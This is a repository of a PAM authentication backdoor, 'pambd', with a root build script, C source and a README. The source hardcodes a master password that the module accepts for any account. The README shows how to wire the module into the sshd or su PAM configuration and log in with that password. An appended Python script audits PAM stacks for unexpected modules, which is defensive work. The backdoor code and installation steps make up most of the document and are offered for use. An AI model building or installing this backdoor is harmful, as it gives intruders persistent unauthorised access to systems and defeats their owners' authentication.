├── gen.sh
├── LICENSE
├── pambd.c
└── README.md


/gen.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# gen.sh - generate the pam backdoor.

BIN_GCC='/usr/bin/gcc'
BIN_LD='/usr/bin/ld'
BIN_RM='/bin/rm'

CFLAGS='-fPIC'
LDFLAGS='-x --shared'

if [ "$(id -u)" != '0' ]; then
    echo 'This script must be run as root!' 1>&2
    exit 1
fi

${BIN_GCC} ${CFLAGS} -c pambd.c
${BIN_LD} ${LDFLAGS} -o /lib/security/pam_bd.so pambd.o
${BIN_RM} pambd.o

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
The MIT License (MIT)

Copyright (c) 2015 Federico Fazzi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/pambd.c:
--------------------------------------------------------------------------------
/**
 * pambd.c - A small pam backdoor.
 * Federico Fazzi
 *
 * This trick shows you how to create a PAM module backdoor that
 * allows a user login with your own custom password.
 *
 * If you try to log in with the real password of the target
 * user and the authentication fails, the pam_auth.so switches to the
 * pambd.so and vice versa!
 *
 * (c) 2015 - MIT License.
 */

#include
#include
#include
#include
#include
#include

#define MYPASSWD "my_master_passwd"

PAM_EXTERN int pam_sm_setcred
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_acct_mgmt
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_authenticate
(pam_handle_t *pamh, int flags,int argc, const char **argv) {
    char *password = NULL;

    pam_get_authtok(pamh, PAM_AUTHTOK, (const char **)&password, NULL);

    if (!strncmp(password, MYPASSWD, strlen(MYPASSWD)))
        return PAM_SUCCESS;

    return -1;
}

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
pambd
=====

Introduction
------------

This trick shows you how to create a PAM module backdoor that
allows a user login with your own custom password.

If you try to log in with the real password of the target
user and the authentication fails, the pam_auth.so switches to the
pambd.so and vice versa.


Generate the backdoor
---------------------

If you get the error:

```bash
pambd.c:13:31: fatal error: security/pam_appl.h: No such file or directory
```

First install the package **libpam-dev**, which contains the header files needed for compilation:

```bash
deftcode pambd $ sudo apt-get install libpam0g-dev
```

Now edit **pambd.c** and set your custom master password:

```c
#define MYPASSWD "my_master_passwd"
```

After that, generate the pam backdoor with:
(This requires root permissions.)

```bash
deftcode pambd $ sudo sh gen.sh
```

This will generate the pam backdoor at **/lib/security/pambd.so**.


Configure the PAM service you want to hijack
--------------------------------------------

Edit **/etc/pam.d/sshd**, or another PAM service file such as **/etc/pam.d/su**, and replace its content with these lines:

```bash
auth		sufficient	pam_rootok.so
auth		sufficient	pam_unix.so	# This must be 'sufficient'.
account		required	pam_unix.so
session		required	pam_unix.so
auth		sufficient	pambd.so	# This is our pam backdoor.
account		sufficient	pambd.so	# --
```


Test the backdoor
-----------------

After you have created the pambd backdoor, you can test it.

```bash
deftcode pambd $ file /lib/security/pambd.so
/lib/security/pambd.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
```

Example with the **SSH** service:

```bash
deftcode pambd $ ssh eurialo@deftcode.local
eurialo@deftcode.local password:

# eg. enter: my_master_passwd or real_user_password

Last login: Thu May 21 05:55:13 2015 from localhost
deftcode ~ $
```

Example with **su**:

```bash
deftcode pambd $ su -
Password:

# eg. enter: my_master_passwd or real_user_password

deftcode ~ #
```

--------------------------------------------------------------------------------
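For reviewing a PAM service file like the one in "Configure the PAM service you want to hijack", the following added audit sketch (not part of the pambd repository) flags `auth`/`account` modules outside an allow-list and reports whether each flagged module can make the stack succeed on its own. `BASELINE`, the function names and both sample stacks are assumptions constructed for this example, and the control-flag evaluation is a simplified model of Linux-PAM's keyword controls.

```python
import re
# Assumption: site-specific baseline of modules allowed in auth/account stacks.
BASELINE = {"pam_rootok.so", "pam_unix.so", "pam_deny.so", "pam_nologin.so"}
LINE = re.compile(r"^-?(auth|account|password|session)\s+(\[[^\]]*\]|\S+)\s+(\S+)")

def parse(text):
    """Return (type, control, module) per rule; comments and @include are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE.match(raw.split("#", 1)[0].strip())
        if m:
            entries.append((m.group(1), m.group(2), m.group(3).rsplit("/", 1)[-1]))
    return entries

def stack_succeeds(entries, mtype, passing):
    """Simplified keyword-control result; `passing` = modules that succeed ([...] not modelled)."""
    required_failed = any_ok = False
    for etype, control, module in entries:
        if etype != mtype:
            continue
        ok = module in passing
        if control == "requisite" and not ok:
            return False              # hard stop
        if control == "required" and not ok:
            required_failed = True    # stack is doomed but keeps running
        if control == "sufficient" and ok and not required_failed:
            return True               # immediate success
        any_ok = any_ok or ok
    return any_ok and not required_failed

def audit(text):
    """Flag non-baseline auth/account modules; last field: can it grant the stack alone?"""
    entries = parse(text)
    return [(t, mod, ctl, stack_succeeds(entries, t, {mod}))
            for t, ctl, mod in entries
            if t in ("auth", "account") and mod not in BASELINE]

# Constructed sample: the rules from the section above.
SAMPLE = """\
auth     sufficient  pam_rootok.so
auth     sufficient  pam_unix.so   # This must be 'sufficient'.
account  required    pam_unix.so
session  required    pam_unix.so
auth     sufficient  pambd.so
account  sufficient  pambd.so
"""
# Constructed contrast: pam_unix.so made 'required' in the auth stack.
STRICT = SAMPLE.replace("sufficient  pam_unix.so", "required    pam_unix.so")

for name, cfg in (("sample", SAMPLE), ("strict", STRICT)):
    print(name, audit(cfg))
```

Any module reported here is worth checking against package ownership and file hashes; a `True` in the last field marks the entries to triage first, since that module's success alone is enough to pass the stack.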